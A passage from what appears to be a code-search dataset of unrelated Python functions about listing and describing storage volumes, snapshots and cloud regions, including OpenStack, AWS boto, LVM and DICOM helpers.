nfvi_volume_data['avail_status'],\n nfvi_volume_data['action'],\n nfvi_volume_data['size_gb'],\n nfvi_volume_data['bootable'],\n nfvi_volume_data['encrypted'],\n nfvi_volume_data['image_uuid'])\n volume_obj = objects.Volume(nfvi_volume)\n volume_objs.append(volume_obj)\n return volume_objs", "def generateInfoVolumes(regions):\n print \"\\nWriting volumes info to output file %s\" % volumes_data_output_file\n with open(volumes_data_output_file, 'w') as f1:\n f1.write(\"VOLUMES\\n\")\n f1.write(\n \"Name\\tvolume_ID\\tKEEP-tag_of_volume\\tKEEP-tag_of_instance\\tproduction?\\tvolume_attachment_state\\tassociated_instance\\tinstance_state\\tsize\\tcreate_time\\tregion\\tzone\\tassociated_snapshot\\n\\n\")\n for r in regions:\n volumes = getVolumes(r)\n print \".\" # give some feedback to the user\n for v in volumes:\n f1.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (get_name_tag(v), v.id, getKeepTag(v), getKeepTag(getInstanceOf(v)), isProduction(v), v.attachment_state(), v.attach_data.instance_id, v.status, v.size,\n v.create_time, v.region.name, v.zone, v.snapshot_id))", "def get_volumes(self):\n res = self.get('%s/volumes' % self.catalog['volume'])\n if res['status'] == 200:\n return json.loads(res['body'])['volumes']\n else:\n LOG.error('Get volumes failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n \"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_volumes():\n vols = []\n try:\n result = run_diskpart(['list volume'])\n except subprocess.CalledProcessError:\n pass\n else:\n # Append volume numbers\n output = result.stdout.decode().strip()\n for tmp in re.findall(r'Volume (\\d+)\\s+([A-Za-z]?)\\s+', output):\n vols.append({'Number': tmp[0], 'Letter': tmp[1]})\n\n return vols", "def data():\n return volumes_fetchers.get_json_data()", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def get_volume(vol_dir):\n volume = []\n # Retrieve all the dicom filepaths\n files = get_filepaths(vol_dir)\n \n for slice_nr, dicom_path in enumerate(files):\n ds = pydicom.dcmread(dicom_path)\n img = ds.pixel_array\n \n if slice_nr == 0:\n # Get this on the first slice only\n spacing = ds.PixelSpacing\n spacing.append(ds.SliceThickness)\n spacing = np.asarray(spacing)\n \n # Note: In our case, sequence name contains venc and direction info\n sequence_name = ds.SequenceName\n # print(sequence_name)\n\n volume.append(img)\n volume = np.asarray(volume)\n return volume, spacing, sequence_name", "def calculateVolumes(data):\n print \"Calculating volumes...\"\n results = {}\n for dataLine in data:\n name = dataLine['name']\n r1 = dataLine['r1']\n r2 = dataLine['r2']\n r3 = dataLine['r3']\n r4 = dataLine['r4']\n t1 = dataLine['t1']\n t2 = dataLine['t2']\n t3 = dataLine['t3']\n volCup = (math.pi/3.0) * t1 * ((r1**2) + (r4**2) - (r1*r4))\n volPeanut = math.pi * (t1 - t2 - t3) * ((r2**2) + (r3**2) - (r2*r3)) / 3.0\n volChoc = volCup - volPeanut\n ratio = volChoc/volPeanut\n print \"Ratio for \" + name + \" is \" + str(ratio)\n results[name] = [r1, volChoc, volPeanut, volCup, ratio]\n return results", "def list_volumes(self, node=None):\n\n data = self._perform_get(self._get_disk_path(), Disks)\n volumes = [self._to_volume(volume=v, node=node) for v in data]\n return volumes", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def get_complete_volume_info_all():\n\n return_list = []\n try:\n vl, err = get_basic_volume_info_all()\n if err:\n raise Exception(err)\n # print 'vl is', vl\n\n if vl:\n for vol_info_dict in vl:\n\n rd, err = get_complete_volume_info(\n vol_info_dict['name'], vol_info_dict)\n if err:\n raise Exception(err)\n\n return_list.append(rd)\n\n except Exception, e:\n return None, 'Error getting complete volume information for all volumes: %s' % str(e)\n else:\n return return_list, None", "def volumes(self):\n return self._volumes", "def volumes(self, details=True):\n if details:\n vol = _volume.Volume\n else:\n vol = _volume.VolumeDetail\n\n return list(self._list(vol, paginated=False))", "def get_surfaces_per_volume(my_core, entityset_ranges):\n\n s_p_v = {}\n for volumeset in entityset_ranges['Volumes']:\n s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size()\n return s_p_v", "def populate_volumes(self):\n print \"Populating volumes info...\"\n volumes = self.get_all_volumes()\n for i in volumes:\n\n # handle associated instance's KEEP-tag\n associated_instance_id = i.attach_data.instance_id\n\n if associated_instance_id is None: # sometimes there is no attached instance\n instance_keep_tag = \"-------no-instance-found\"\n else:\n instance_keep_tag = Ins.spreadsheet[associated_instance_id]['KEEP_tag']\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n instance_KEEP_tag=instance_keep_tag,\n associated_instance_id=associated_instance_id,\n PROD_tag=self.is_production(i), attachment_state=i.attachment_state(),\n state=i.volume_state(), status=i.status, iops=i.iops, size=i.size,\n created=i.create_time, region=i.region.name)", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def get_volume_list():\n return parse_list_output(Popen('cinder list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def getVolumePoints(minRes, rRes, region):\n\n # when every resolution has the same bndry buffer\n maxDx = (1. + 1.e-8) * lx / float(minRes)\n dr = pecRad / float(rRes)\n\n # shell distances inside dielectric\n rmin = 0.5 * math.sqrt(3.0) * maxDx\n rmax = epsRad - 3.0 * maxDx\n rIn = numpy.arange(rmin, rmax, dr)\n\n # shell distances outside dielectric\n rmin = epsRad + 3.0 * maxDx\n rmax = pecRad - 3.0 * maxDx\n rOut = numpy.arange(rmin, rmax, dr)\n\n if region == \"in\":\n rs = rIn\n elif region == \"out\":\n rs = rOut\n else:\n rs = numpy.concatenate([rIn, rOut])\n\n points = []\n for r in rs:\n dTheta = math.acos(1.0 - 0.5 * (dr / r)**2)\n thetaMin = math.asin(maxDx / r / math.sqrt(2.0))\n thetaMax = math.acos(0.5 * maxDx / r)\n for theta in numpy.arange(thetaMin, thetaMax, dTheta):\n sinTh = math.sin(theta)\n dPhi = dTheta / sinTh\n phiMin = math.asin(0.5 * maxDx / (r * sinTh))\n phiMax = math.acos(0.5 * maxDx / (r * sinTh))\n for phi in numpy.arange(phiMin, phiMax, dPhi):\n points.append([r * math.sin(theta) * math.cos(phi),\n r * math.sin(theta) * math.sin(phi),\n r * math.cos(theta)])\n return points", "def get_volume_info(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n volume_info_list = []\n for volume in volumes:\n command = 'cinder show %s' % volume['id']\n volume_info = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])\n att = volume_info['attachments'].replace(\"'\", \"\\\"\").replace(\n \"u\\\"\", \"\\\"\").replace(\" None,\", \" \\\"None\\\",\")\n volume_info['device'] = json.loads(att)[0]['device']\n volume_info_list.append(volume_info)\n return volume_info_list", "def fusion_api_get_storage_volumes(self, uri=None, param='', api=None, headers=None):\n return self.volume.get(uri=uri, api=api, headers=headers, param=param)", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def get_named_volumes(blocks_partition, block_shape):\n logger.debug(\"== Function == get_named_volumes\")\n d = dict()\n logger.debug(\"[Arg] blocks_partition: %s\", blocks_partition)\n logger.debug(\"[Arg] block_shape: %s\", block_shape)\n for i in range(blocks_partition[0]):\n for j in range(blocks_partition[1]):\n for k in range(blocks_partition[2]):\n bl_corner = (block_shape[0] * i,\n block_shape[1] * j,\n block_shape[2] * k)\n tr_corner = (block_shape[0] * (i+1),\n block_shape[1] * (j+1),\n block_shape[2] * (k+1)) \n index = _3d_to_numeric_pos((i, j, k), blocks_partition, order='F')\n d[index] = Volume(index, bl_corner, tr_corner)\n logger.debug(\"Indices of names volumes found: %s\", d.keys())\n logger.debug(\"End\\n\")\n return d", "def test_aws_service_api_volumes_get(self):\n pass", "def get_list(self, regions = None):\r\n \r\n data = []\r\n if regions is None:\r\n regions = ['PHA','STC','JHC','PLK','KVK','ULK','LBK','HKK','PAK','OLK','MSK','JHM','ZLK','VYS']\r\n for region in regions:\r\n cache_file = os.path.join(self.__folder, self.__cache.format(region))\r\n if region in self.__stored_data.keys():\r\n data.append(self.__stored_data[region])\r\n elif os.path.isfile(cache_file):\r\n with gzip.open(cache_file, \"rb\") as file_data:\r\n self.__stored_data[region] = pickle.load(file_data)\r\n data.append(self.__stored_data[region])\r\n else:\r\n parsed_data = self.parse_region_data(region)\r\n with gzip.open(cache_file, \"wb\") as file_data:\r\n pickle.dump(parsed_data, file_data, protocol=-1)\r\n self.__stored_data[region] = parsed_data\r\n data.append(parsed_data)\r\n concatenated_data = []\r\n for j in range(65):\r\n concatenated_data.append(np.concatenate([data[i][1][j] for i in range(len(data))]))\r\n return (data[0][0], concatenated_data)", "def get_device_map():\n ret = []\n vlist = subprocess.check_output(['ceph-volume', 'lvm', 'list',\n '--format=json'])\n for osd_id, data in json.loads(vlist.decode('utf8')).items():\n osd_id = normalize_osd_id(osd_id)\n for elem in data:\n for device in elem['devices']:\n ret.append({'id': osd_id, 'path': device})\n return ret", "def volumes(self) -> Sequence['outputs.GetVolumeGroupSapHanaVolumeResult']:\n return pulumi.get(self, \"volumes\")", "def volume(self):\n return [node.volume for node in self]", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def volumes(self) -> Optional[Sequence['_core.v1.outputs.Volume']]:\n return pulumi.get(self, \"volumes\")", "def _get_volumes_from_id(volume_id):\n\n volumes = _get_volumes(list_of_volume_ids=volume_id)\n\n return volumes[0] if volumes else volumes", "def test_volumes_get(self):\n pass", "def test_aws_service_api_volume_types_get(self):\n pass", "def volume(self):\n return {'lvad': self._v}", "def get_basic_volume_info(vol_name, vl=None):\n return_dict = None\n try:\n vl, err = get_basic_volume_info_all()\n for v in vl:\n if v['name'] == vol_name:\n return_dict = v\n break\n except Exception, e:\n return None, 'Error getting basic volume information for a specific volume : %s' % str(e)\n else:\n return return_dict, None", "def get_regions(locale):\n\n def json_file(name):\n return os.path.join(json_dir, 'regions', '%s.json' % name)\n\n filepath = json_file(locale)\n\n if not os.path.exists(filepath):\n filepath = json_file('en-US')\n if not os.path.exists(filepath):\n raise Exception('Unable to load region data')\n\n with codecs.open(filepath, encoding='utf8') as fd:\n return json.load(fd)", "def get_replication_status(response_json):\r\n paired_vols = {}\r\n for volume in response_json['result']['volumes']:\r\n vol_id = volume['volumeID']\r\n vol_name = volume['name']\r\n paired_vols[vol_id] = vol_name\r\n return paired_vols", "def listInstancesRegionZone(region,zone):\n\tprint \"-\"*80\n\tprint \"# Region :\",region,\" Zone\", zone\t\n\tprint \"-\"*80\n\tinstances = getInstancesRegionZone(region,zone)\n\tif instances:\n\t\tfor instance in instances:\n\t\t\tprint \"[\",instance.ami_launch_index,\"]\",instance.ip_address,\" (\",instance.private_ip_address,\") \",instance.instance_type,\" key=\",instance.key_name", "def get_region(self, region):\n\n return self.adapter.get_region(region) \n\n\n\n\n #file_compression = \"\"\n # magic_dict = {\n # b\"\\x1f\\x8b\\x08\": \"gz\",\n # b\"\\x42\\x5a\\x68\": \"bz2\",\n # b\"\\x50\\x4b\\x03\\x04\": \"zip\"\n # }\n # \n\n # max_len = max(len(x) for x in magic_dict)\n # with open(file_path, \"rb\") as f:\n # file_start = f.read(max_len)\n # for magic, filetype in magic_dict.items():\n # if file_start.startswith(magic):\n # file_compression = filetype\n # split_ext = file_path.split(\".\")\n # extension = split_ext[len(split_ext) -1]\n # if(file_compression == \"zip\"):\n # if extension != \"zip\":\n # subprocess.call(\"mv {} {}.zip\".format(file_path, file_path).split())\n # subprocess.call(\"unzip {} -d .\".format(file_path).split())\n # if(file_compression == \"bz2\"):\n # if extension != \"bz2\":\n # subprocess.call(\"mv {} {}.bz2\".format(file_path,file_path).split())\n # subprocess.call(\"bzip2 -df {}\".format(file_path).split())\n # if(file_compression == \"gz\"):\n # if extension != \"gz\":\n # subprocess.call(\"mv {} {}.gz\".format(file_path,file_path).split())\n # subprocess.call(\"gzip -df {}\".format(file_path).split())", "def volumes(self) -> Optional[Sequence['_core.v1.outputs.VolumePatch']]:\n return pulumi.get(self, \"volumes\")", "def list_volumes(self):\n\n print(self.format_string % (\"OpenStack Volume\", \"ScaleIO Name\", \"ScaleIO ID\", \"Attached\"))\n for os_volume in self.openstack.block_store.volumes(details=True,\n all_tenants=self.args.OS_ALL_TENANTS):\n sio_volume = self._convert_os_to_sio(os_volume.id)\n try:\n vol_id = self.scaleio.get_volumeid(sio_volume)\n if vol_id is not None:\n attached = 'True'\n if not os_volume.attachments:\n attached = 'False'\n print(self.format_string % (os_volume.id, sio_volume, vol_id, attached))\n except:\n # if we got here, there is no SIO volume for the openstack volume\n pass", "def get_volume_parameters(volumes):\n volume_parameters = dict()\n for v in volumes:\n if v['type'] == 'pv':\n # FIXME: How should we handle existing PVs?\n continue\n\n if v['type'] == 'pvc':\n mount_point = v['mount_point'].replace('/', '_').strip('_')\n par_name = \"vol_{}\".format(mount_point)\n volume_parameters[par_name] = ('str', v['name'])\n elif v['type'] == 'new_pvc':\n rok_url = v['annotations'].get(\"rok/origin\")\n if rok_url is not None:\n par_name = \"rok_{}_url\".format(v['name'].replace('-', '_'))\n volume_parameters[par_name] = ('str', rok_url)\n else:\n raise ValueError(\"Unknown volume type: {}\".format(v['type']))\n return volume_parameters", "def volumes(interval,symbol):\n\ttoday = datetime.utcnow()\n\tcurrent_time = today.time()\n\tdaily_start_time = dtime(3,45)\n\tdaily_end_time = dtime(10,15)\n\tvolume_indicator = {} \n\tstart_timestamp = 0\n\tend_timestamp = 0\n\tif current_time < daily_start_time:\n\t\tyesterday = today - timedelta(days=1)\n\t\tstart_timestamp = time.mktime(datetime(yesterday.year,yesterday.month,yesterday.day,\n\t\t\t\t\t\t\t\t\t\t\t\t\t9,15,0,0,tzinfo=pytz.UTC).timetuple())\n\t\tend_timestamp = time.mktime(datetime(yesterday.year,yesterday.month,yesterday.day,\n\t\t\t\t\t\t\t\t\t\t\t\t\t15,45,0,0,tzinfo=pytz.UTC).timetuple())\n\t\tintervals = Interval.get_intervals(start_timestamp,end_timestamp,interval)\n\t\tdata = Data.get_data(symbol)\n\t\tvolume_indicator = Volume.get_volume_indications(intervals,data)\n\n\telif current_time > daily_end_time:\n\t\tstart_timestamp = time.mktime(datetime(today.year,today.month,today.day,9,15,0,0,\n\t\t\t\t\t\t\t\t\t\ttzinfo=pytz.UTC).timetuple())\n\t\tend_timestamp = time.mktime(datetime(today.year,today.month,today.day,15,45,0,0,\n\t\t\t\t\t\t\t\t\t\ttzinfo=pytz.UTC).timetuple())\n\t\tintervals = Interval.get_intervals(start_timestamp,end_timestamp,interval)\n\t\tdata = Data.get_data(symbol)\n\t\tvolume_indicator = Volume.get_volume_indications(intervals,data)\n\n\telse:\n\n\t\tstart_timestamp = time.mktime(datetime(today.year,today.month,today.day,9,15,0,0,\n\t\t\t\t\t\t\t\t\t\t\ttzinfo=pytz.UTC).timetuple())\n\t\tcurrent_time = datetime.now()\n\t\tend_timestamp = time.mktime(datetime(today.year,today.month,today.day,current_time.hour,\n\t\t\t\t\t\t\t\t\t\t\t\tcurrent_time.minute,0,0,tzinfo=pytz.UTC).timetuple())\n\t\tintervals = Interval.get_intervals(start_timestamp,end_timestamp,interval)\n\t\tdata = Data.get_data(symbol)\n\t\tvolume_indicator = Volume.get_volume_indications(intervals,data)\n volume_indicator['symbol']=symbol\n\treturn json.dumps(volume_indicator,sort_keys=True,indent=4,separators=(',',': '))", "def ft_volumeslice( slice_name ):\n print \"slice: %s\" % slice_name\n \n volumes = get_volumeslice_volume_names( slice_name )\n \n print \"volumes mounted in slice %s:\" % slice_name\n for v in volumes:\n print \" %s:\" % v\n \n vs = get_volumeslice( v, slice_name )\n \n print \" %s\" % dir(vs)", "def get_volumeslice_volume_names( slice_name ):\n try:\n all_vs = models.VolumeSlice.objects.filter( slice_id__name = slice_name )\n volume_names = []\n for vs in all_vs:\n volume_names.append( vs.volume_id.name )\n \n return volume_names\n except Exception, e:\n logger.exception(e)\n logger.error(\"Failed to query datastore for volumes mounted in %s\" % slice_name)\n return None", "def get_complete_volume_info(vol_name, vol_info_dict=None):\n return_dict = {}\n try:\n if not vol_info_dict:\n vol_info_dict, err = get_basic_volume_info(vol_name)\n if err:\n raise Exception(err)\n\n return_dict = vol_info_dict\n\n vol_status_dict = {}\n if vol_info_dict['status'] == 1:\n vol_status_dict, err = get_volume_status(\n vol_info_dict['name'], vol_info_dict)\n if err:\n raise Exception(err)\n\n if vol_info_dict['status'] == 1:\n if vol_status_dict:\n # Add the status and usage info\n return_dict.update(vol_status_dict)\n vol_process_dict, err = get_volume_process_status(\n vol_name, vol_info_dict, vol_status_dict)\n if err:\n raise Exception(err)\n\n return_dict['processes_ok'] = vol_process_dict['processes_ok']\n\n for br in return_dict['brick_status']:\n if br in vol_process_dict['brick_status']:\n return_dict['brick_status'][br].update(\n vol_process_dict['brick_status'][br])\n\n quotas, err = get_volume_quota(vol_name, vol_info_dict)\n if err:\n raise Exception(err)\n return_dict['quotas'] = quotas\n\n except Exception, e:\n return None, 'Error getting complete volume information : %s' % str(e)\n else:\n return return_dict, None", "def getInstancesD(region):\n instances = getInstances(region)\n instancesDicts = {\"id\": i.id,\n \"KEEP-tag\": getKeepTag(i),\n \"instance_type\": i.instance_type,\n \"state\": i.state,\n \"launch_time\": i.launch_time,\n \"security_groups\": getGroups(i),\n \"region\": i.region.name,\n \"PROD\": isProduction(i)\n }", "def parse_region_data(self, region):\r\n \r\n self.download_data()\r\n region_filename = self.__get_region_filename(region)\r\n list_str = [\"region\", \"p1\", \"p36\", \"p37\", \"p2a\", \"weekday(p2a)\", \"p2b\", \"p6\", \"p7\", \"p8\", \"p9\", \"p10\", \r\n \"p11\", \"p12\", \"p13a\", \"p13b\", \"p13c\", \"p14\", \"p15\", \"p16\", \"p17\", \"p18\",\"p19\", \"p20\", \"p21\", \r\n \"p22\", \"p23\", \"p24\", \"p27\", \"p28\", \"p34\", \"p35\", \"p39\", \"p44\", \"p45a\", \"p47\", \"p48a\", \"p49\", \r\n \"p50a\", \"p50b\", \"p51\", \"p52\", \"p53\", \"p55a\", \"p57\", \"p58\", \"a\", \"b\", \"d\", \"e\", \"f\", \"g\", \"h\", \r\n \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"p5a\"]\r\n \r\n row_count = self.__get_files_row_count(region)\r\n list_arrays = [np.zeros(row_count, dtype=dt) for dt in self.__types]\r\n row_index = 0\r\n for file in self.__files:\r\n file_to_parse = os.path.join(self.__folder, os.path.basename(file))\r\n with zipfile.ZipFile(file_to_parse, \"r\") as zf:\r\n with zf.open(region_filename, 'r') as csv_file:\r\n reader = csv.reader(TextIOWrapper(csv_file, 'windows-1250'), delimiter=';', quotechar='\"')\r\n for row in reader:\r\n list_arrays[0][row_index] = region\r\n for col_index, col in enumerate(row):\r\n try:\r\n list_arrays[col_index + 1][row_index] = col\r\n except ValueError:\r\n if list_arrays[col_index + 1][row_index].dtype == np.int64:\r\n list_arrays[col_index + 1][row_index] = -1\r\n elif list_arrays[col_index + 1][row_index].dtype == 'datetime64[D]':\r\n print('Error2:', col)\r\n elif list_arrays[col_index + 1][row_index].dtype == np.float64:\r\n if type(col) != str:\r\n list_arrays[col_index + 1][row_index] = col.replace(',', '.')\r\n else:\r\n list_arrays[col_index + 1][row_index] = float(\"nan\")\r\n row_index += 1\r\n \r\n return (list_str, list_arrays)", "def get_lvs() -> List[Dict[str, str]]:\n p = subprocess.run(\n [\"lvs\", \"--reportformat\", \"json\"], check=True, capture_output=True\n )\n output = json.loads(p.stdout)\n result = []\n for lv in output[\"report\"][0][\"lv\"]:\n lvname = lv[\"lv_name\"]\n vgname = lv[\"vg_name\"]\n devname = f\"{vgname}-{lvname}\"\n path = f\"/dev/mapper/{devname}\"\n result.append({\"lv\": lvname, \"vg\": vgname, \"devname\": devname, \"devpath\": path})\n return result", "def variant_sample_list_2_3():\n return {\n \"schema_version\": \"2\",\n \"status\": \"current\",\n \"project\": \"12a92962-8265-4fc0-b2f8-cf14f05db58b\",\n \"institution\": \"828cd4fe-ebb0-4b36-a94a-d2e3a36cc989\",\n \"variant_samples\": [\n {\n \"selected_by\": \"834559db-a3f6-462c-81a4-f5d7e5e65707\",\n \"date_selected\": \"2021-07-09T16:42:23.694711+00:00\",\n \"variant_sample_item\": \"013bcc47-3885-4682-99c2-800b95765524\",\n \"filter_blocks_used\": {\n \"filter_blocks\": [\n {\n \"name\": \"Breast Cancer\",\n \"query\": \"associated_genotype_labels.proband_genotype_label=Heterozygous&associated_genelists=Breast+Cancer+%2828%29&variant.genes.genes_most_severe_consequence.impact=MODERATE&variant.genes.genes_most_severe_consequence.impact=HIGH\"\n }\n ],\n \"intersect_selected_blocks\": False\n }\n },\n {\n \"selected_by\": \"834559db-a3f6-462c-81a4-f5d7e5e65707\",\n \"date_selected\": \"2021-07-09T16:42:23.696554+00:00\",\n \"variant_sample_item\": \"ac62850f-6f77-4d3b-9644-41699238d0e2\",\n \"filter_blocks_request_at_time_of_selection\": \"some-gibberish\"\n }\n ],\n \"created_for_case\": \"GAPCAJQ1L99X\",\n \"uuid\": \"292250e7-5cb7-4543-85b2-80cd318287b2\"\n }", "def get_volume_info(self, uid):\n LOG.debug(\"Entering\")\n cmd = \"svcinfo lsvdisk -bytes -filtervalue vdisk_UID=%s -delim :\" % uid\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n raise SVCVolumeNotFound(\n _(\"Couldn't find volume information for UID %s\") % uid)\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_KEY_VDISK_ID)\n diskId = values[index]\n index = header.index(SVC_KEY_VDISK_NAME)\n name = values[index]\n index = header.index(SVC_KEY_VOLUME_GROUP)\n volumeGroup = values[index]\n index = header.index(SVC_KEY_VDISK_CAPACITY)\n capacity = values[index]\n\n info = {SVC_KEY_VDISK_ID: diskId,\n SVC_KEY_VDISK_NAME: name,\n SVC_KEY_VOLUME_GROUP: volumeGroup,\n SVC_KEY_VDISK_CAPACITY: capacity}\n\n LOG.debug(\"Exiting\")\n return info", "def getDataBaseLists(data, db):\n # The list of regions - ex: \"46 60 26 23\" for region of coordinates 46.60 26.23\n regions = []\n # The list of lists of records - each region can have multiple records\n records = []\n try:\n # Loop through all data in database dictionary\n for reg, rec in data:\n # Store the region name in list\n regions.append(reg)\n # Create a new list for the current region to store its records\n rec_list = []\n # Loop through records dictionary to get records name and data\n for rec_name, rec_data in rec.items():\n try:\n # Store all records for the current region as Record object\n rec_list.append(Record(rec_name, Data(rec_data)))\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # Something was wrong with the current record - delete it from database\n db.child(Constants.data_path).child(reg).child(rec_name).remove()\n return None, None\n # Store the records list of the current region in the list\n records.append(rec_list)\n return regions, records\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # There was some invalid data in database\n print(Texts.invalid_database_data)\n return None, None", "def describe_volumes(InstanceId=None, StackId=None, RaidArrayId=None, VolumeIds=None):\n pass", "def get_volumes_metadata(cls, cluster):\n def _get_volumes_ids(instance):\n return [v['id']\n for v in instance.volumes_metadata.get('volumes', [])]\n\n volumes_metadata = {\n 'volumes': [],\n 'volumes_roles_mapping': {},\n 'rule_to_pick_boot_disk': [],\n }\n\n cluster_volumes_ids = _get_volumes_ids(cluster)\n release_volumes_ids = _get_volumes_ids(cluster.release)\n processed_volumes = {}\n\n enabled_plugins = ClusterPlugin.get_enabled(cluster.id)\n for plugin_adapter in map(wrap_plugin, enabled_plugins):\n metadata = plugin_adapter.volumes_metadata\n\n for volume in metadata.get('volumes', []):\n volume_id = volume['id']\n for owner, volumes_ids in (('cluster', cluster_volumes_ids),\n ('release', release_volumes_ids)):\n if volume_id in volumes_ids:\n raise errors.AlreadyExists(\n 'Plugin {0} is overlapping with {1} '\n 'by introducing the same volume with '\n 'id \"{2}\"'.format(plugin_adapter.full_name,\n owner,\n volume_id)\n )\n elif volume_id in processed_volumes:\n raise errors.AlreadyExists(\n 'Plugin {0} is overlapping with plugin {1} '\n 'by introducing the same volume with '\n 'id \"{2}\"'.format(\n plugin_adapter.full_name,\n processed_volumes[volume_id],\n volume_id\n )\n )\n\n processed_volumes[volume_id] = plugin_adapter.full_name\n\n volumes_metadata.get('volumes_roles_mapping', {}).update(\n metadata.get('volumes_roles_mapping', {}))\n volumes_metadata.get('volumes', []).extend(\n metadata.get('volumes', []))\n volumes_metadata.get('rule_to_pick_boot_disk', []).extend(\n metadata.get('rule_to_pick_boot_disk', []))\n\n return volumes_metadata", "def volume_curves(self):\n for key in self._volume_curves:\n yield key, self._data[key]", "def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"volumes\")", "def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"volumes\")", "def reservations(self):\r\n reservations = dict()\r\n for key in self._mounts.keys():\r\n reservations.update(self._mounts[key]['reservations'])\r\n return reservations", "def get_volumes(patient, pet_folder, struct_folders, number, volumes, plot_data=False):\n print(\"--------------------------------------------------------------------------------------\")\n print(\"Patient {:02d}: {}\".format(number, patient))\n # get all dicom image's paths\n dicom_images = [pet_folder+\"/\"+f for f in os.listdir(pet_folder) if f.lower().endswith(\".dcm\")]\n dicom_images.sort()\n # get information from dicom header\n dicom_info = dicom.read_file(dicom_images[0])\n pixel_shape = (int(dicom_info.Rows), int(dicom_info.Columns), int(dicom_info.NumberOfSlices))\n pixel_spacing = (float(dicom_info.PixelSpacing[0]), float(dicom_info.PixelSpacing[1]),\n 